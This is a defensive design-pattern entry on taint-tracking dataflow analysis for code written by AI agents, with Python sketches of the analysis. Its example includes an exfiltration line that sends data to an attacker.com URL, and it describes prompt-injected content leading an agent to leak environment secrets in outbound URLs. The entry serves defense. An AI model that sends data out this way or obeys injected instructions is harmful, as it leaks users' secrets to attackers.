Code-Then-Execute with Dataflow Analysis
also known as Tainted-Value Code Execution, Sandbox-DSL with Provenance
Have the agent emit code in a sandbox DSL whose values are statically tagged trusted/tainted via dataflow analysis before execution, enabling per-value policy enforcement.
Context
An agent solves complex tasks by generating code that the runtime executes — data extraction, multi-step computations, tool chains. Some inputs to the code come from untrusted sources (user input, fetched content, tool outputs from third-party APIs).
Problem
Without provenance tracking, the executor cannot distinguish trusted values (the agent's plan, user goal) from tainted values (fetched content that could be attacker-controlled). The same `exec(code)` call runs code built from either kind of value. A prompt injection in fetched content can produce code that, for example, reads secrets from environment variables and embeds them in an outbound URL, and the sandbox cannot reject it because it cannot tell that the URL is tainted.
Forces
- Free-form code generation is the agent's primary capability.
- Static dataflow analysis on generated code constrains expressivity.
- Tagging every value as trusted/tainted requires the DSL to track provenance.
Example
A research agent generates code: `summary = summarize(fetch('https://...'))`. The fetched content is TAINTED, and so is `summary`, which is derived from it. The agent then writes `requests.get(f'https://attacker.com?d={summary}')`. Dataflow analysis sees a TAINTED value flowing into network egress and rejects the program before execution. Without the analysis, the sandbox would have allowed the egress because outbound HTTPS is permitted.
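The check in this example can be sketched with Python's standard `ast` module. This is a minimal illustration, not the pattern's reference implementation: the names `TAINT_SOURCES`, `SENSITIVE_SINKS`, and `find_violations` are hypothetical, the analysis only handles straight-line code with simple assignments, and it conservatively treats any expression that contains a tainted value as tainted.

```python
import ast

# Hypothetical policy for this sketch: calls that introduce taint,
# and calls that count as sensitive sinks.
TAINT_SOURCES = {"fetch"}
SENSITIVE_SINKS = {"requests.get"}


def call_name(node: ast.Call) -> str:
    """Return the dotted name of a call, e.g. 'requests.get'."""
    return ast.unparse(node.func)


def is_tainted(node: ast.AST, tainted_vars: set[str]) -> bool:
    """Conservative rule: an expression is tainted if any sub-expression
    is a tainted variable or a call to a taint source."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Name) and sub.id in tainted_vars:
            return True
        if isinstance(sub, ast.Call) and call_name(sub) in TAINT_SOURCES:
            return True
    return False


def find_violations(source: str) -> list[str]:
    """Scan top-level statements in order and report tainted sink calls."""
    tainted_vars: set[str] = set()
    violations: list[str] = []
    for stmt in ast.parse(source).body:
        # Check every sink call in this statement against the current taint state.
        for sub in ast.walk(stmt):
            if isinstance(sub, ast.Call) and call_name(sub) in SENSITIVE_SINKS:
                args = list(sub.args) + [kw.value for kw in sub.keywords]
                if any(is_tainted(arg, tainted_vars) for arg in args):
                    violations.append(
                        f"line {stmt.lineno}: tainted value reaches {call_name(sub)}"
                    )
        # Then propagate taint through simple `name = expr` assignments.
        if isinstance(stmt, ast.Assign):
            for target in stmt.targets:
                if isinstance(target, ast.Name):
                    if is_tainted(stmt.value, tainted_vars):
                        tainted_vars.add(target.id)
                    else:
                        tainted_vars.discard(target.id)
    return violations


# The program from the example; it is only parsed, never executed.
program = """
summary = summarize(fetch('https://...'))
requests.get(f'https://attacker.com?d={summary}')
"""
violations = find_violations(program)
if violations:
    print("rejected:", violations)
```

A production analysis would also need to cover control flow, function definitions, attribute and container writes, and aliasing, which is one reason the pattern restricts the agent to a DSL subset.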
Solution
Therefore:
Define a sandbox DSL (a subset of Python/TS or a custom Pyret-style language) where every value carries a provenance tag (TRUSTED, TAINTED, MIXED). The runtime performs static dataflow analysis on each agent-generated program before execution: if a TAINTED value reaches a sink declared sensitive (network egress, env reads, file writes outside the scratch dir), the program is rejected. Pair with sandbox-isolation and action-selector-pattern.
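One way to picture the provenance tags is as a small lattice with a join operation. The sketch below is an assumption-laden illustration: the text does not define how MIXED arises or how sinks treat it, so here MIXED is assumed to result from combining values with differing tags, and the sink policy is assumed to admit only TRUSTED values. `Tagged`, `join`, and `allowed_at_sink` are hypothetical names.

```python
from dataclasses import dataclass
from enum import Enum


class Provenance(Enum):
    TRUSTED = "trusted"
    TAINTED = "tainted"
    MIXED = "mixed"


def join(a: Provenance, b: Provenance) -> Provenance:
    """Combine the tags of two inputs.
    Assumption: identical tags are preserved, differing tags collapse to MIXED."""
    return a if a is b else Provenance.MIXED


@dataclass(frozen=True)
class Tagged:
    """A string value paired with its provenance tag."""
    value: str
    tag: Provenance

    def concat(self, other: "Tagged") -> "Tagged":
        # The result inherits the join of both operands' tags.
        return Tagged(self.value + other.value, join(self.tag, other.tag))


def allowed_at_sink(v: Tagged) -> bool:
    """Assumed policy: only fully TRUSTED values may reach a sensitive sink."""
    return v.tag is Provenance.TRUSTED


base = Tagged("https://example.com/?q=", Provenance.TRUSTED)
fetched = Tagged("text from a fetched page", Provenance.TAINTED)
url = base.concat(fetched)  # tag becomes MIXED under the assumed join
```

Treating MIXED like TAINTED at sinks is the conservative choice; a deployment could instead define per-sink rules for MIXED values.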
What this pattern forbids. The runtime may not execute agent-generated code without first running dataflow analysis; programs whose taint reaches a sensitive sink are rejected, not sanitized.
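The rule above can be read as a single gate in front of the executor. A minimal sketch, assuming an analyzer that returns a list of violation messages: `run_checked`, `PolicyViolation`, and the two stub functions are hypothetical names used only for illustration, and the stub analyzer is a stand-in for real dataflow analysis.

```python
from typing import Callable


class PolicyViolation(Exception):
    """Raised when analysis reports taint reaching a sensitive sink."""


def run_checked(
    source: str,
    analyze: Callable[[str], list[str]],
    execute: Callable[[str], object],
) -> object:
    """The only path to execution: analyze first, reject on any violation.
    The program is never rewritten or sanitized."""
    violations = analyze(source)
    if violations:
        raise PolicyViolation("; ".join(violations))
    return execute(source)


executed: list[str] = []


def stub_analyze(source: str) -> list[str]:
    # Stand-in analyzer for the demo: flags any program that names the sink.
    if "requests.get" in source:
        return ["tainted value reaches requests.get"]
    return []


def stub_execute(source: str) -> str:
    # Stand-in executor: records the program instead of running it.
    executed.append(source)
    return "ok"


try:
    run_checked("requests.get(url)", stub_analyze, stub_execute)
    rejected = False
except PolicyViolation:
    rejected = True
```

Raising an exception instead of returning a cleaned-up program keeps the failure visible to the caller and avoids executing a variant the agent never wrote.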
And the patterns that stand alongside it, or against it —
- complements Sandbox Isolation ★★: Run agent-emitted code or actions in a contained environment with restricted filesystem, network, and process privileges.
- complements Code-as-Action Agent ★: Have the agent emit a code snippet as its action each step, executed in a constrained interpreter, instead of emitting JSON tool calls; tool composition becomes function nesting and control flow inside the snippet.
- complements Code Execution ★★: Let the model emit code, run it in a sandbox, and treat the run as the answer instead of trusting the model to compute in its head.
- complements Action Selector Pattern ★: Eliminate the feedback channel from tool outputs back into the agent's reasoning step by having the agent select actions from a fixed catalog rather than free-form generation over tool output.
- complements Tool Output Poisoning Defense ★: Treat tool output as untrusted content and apply instruction-stripping plus per-tool trust labels.